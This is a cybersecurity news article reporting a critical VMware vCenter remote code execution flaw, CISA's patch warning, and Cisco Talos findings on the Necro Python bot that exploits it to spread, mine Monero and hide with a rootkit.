Cybersecurity News

VMware Flaw: Patch Now as Hackers, Malware Exploit Security Gap

A widespread bot campaign has been observed delivering worming malware via a recently disclosed VMware RCE flaw, as CISA warns attackers are seeking to exploit the security gap.

critical RCE flaw in VMware platforms urges prompt patch as new bot-based malware targets unpatched systems

By Jessica Davis

- Since its disclosure by VMware just two weeks ago, researchers have observed attackers hunting for unpatched systems and a widespread bot campaign that delivers worming malware, according to a Cisco Talos report and a Cybersecurity and Security Infrastructure Agency alert.

CISA warns of an increased likelihood that attackers are working to exploit the critical remote code execution (RCE) vulnerability in VMware vCenter Server and Cloud Foundation platforms. Many organizations have failed to patch the flaw with the software update provided on May 25.

Ranked at a 9.8 out of 10 for severity, the flaw is found in vCenter Server 6.5, 6.7, and 7.0 -- widely used across the globe. The vulnerability is caused by a lack of validation input within the Virtual SAN Health Check plugin, which is enabled by default in the vCenter Server.

A successful exploit could enable a remote attacker with access to port 443 to take control of the impacted system and execute commands with unrestricted privileges on the victim’s network.

The concern is that the vCenter server is used to administer VMware’svSphere and ESXi host products, with VMware warning that the flaw can be exploited “by anyone who can reach vCenter Server over the network to gain access, regardless of whether you use vSAN or not.”

READ MORE: CISA: VMware Patches Critical Server Flaw, Warns of Ransomware Threat

At the time of the disclosure, VMware leaders urged entities to immediately patch the security gap in light of the heightened threat landscape.

“In this era of ransomware it is safest to assume that an attacker is already inside the network somewhere, on a desktop and perhaps even in control of a user account, which is why we strongly recommend declaring an emergency change and patching as soon as possible,” VMware Technical Architect Bob Plankers, explained at the time.

“These updates fix a critical security vulnerability, and it needs to be considered at once. Organizations that practice change management using the ITIL definitions of change types would consider this an ‘emergency change,’” he added.

As CISA has been informed of attackers seeking to exploit unpatched systems, the alert warns entities to review previous VMware mitigation measures and workarounds, or for administrators to immediately apply the software update.

Patching is critical, as Cisco Talos researchers have observed a malware campaign using a Necro Python bot and new functionalities to exploit a range of vulnerabilities in various platforms, including the recently disclosed RCE flaws in VMware vSphere platforms.

READ MORE: VMware Issues Patch for 2 Severe Flaws Posing Credential Theft Risk

Check Point discovered the FreakOut bot in January 2020, which uses Internet Relay Chat (IRC) for communication with the threat actor’s C2 server. The bot contains functionality to spread through the exploit of vulnerabilities in applications and operating systems.

Although the threat has been leveraged since 2015, Cisco Talos has seen a drastic increase in bot activity since the beginning of the year.

The threat actors have also been observed leveraging brute-force, password-spraying attacks over the SSH protocol. But the primary attack method is DDoS attacks, which scans for known vulnerabilities in order to exfiltrate network traffic through a SOCKS proxy.

The bot also installs cryptocurrency mining software to mine Monero, as well as to inject into JavaScript code that downloads and launches Monero miner code.

“The bot hides its presence on the system by installing a user-mode rootkit designed to hide the malicious process and malicious registry entries created to ensure that the bot runs every time a user logs into the infected system,” researchers explained.

READ MORE: FBI: Unpatched Fortinet Flaws Remain Under Attack by APT Actors

“The bot also injects the code to download and execute a JavaScript-based miner from an attacker-controlled server into HTML and PHP files on infected systems,” they added. “If the user opens the infected application, a JavaScript-based Monero miner will run within their browser's process space.”

The concern is that the bot is targeting a range of unpatched vulnerabilities, which increases the risk of spreading and infecting systems. As the threat is self-replicating and primarily exploits server-side software, the potential impact is much greater.

The healthcare sector has seen a large increase in bad bot traffic this year, given the rise in COVID-19 websites, applications, and tracking tools. Researchers have previously explained that bot use can not only enable system exploits, it can cause a host of other risks for the sector.

“The use cases for bots in healthcare extend beyond nefarious purposes,” Edward Roberts, application security strategist at Imperva, previously told HealthITSecurity.com. “Health insurance providers have used bots for competitive intelligence by scraping their competitors’ policies online, and medical listing services often use scraping bots to keep their databases of doctors and specialists up-to-date.”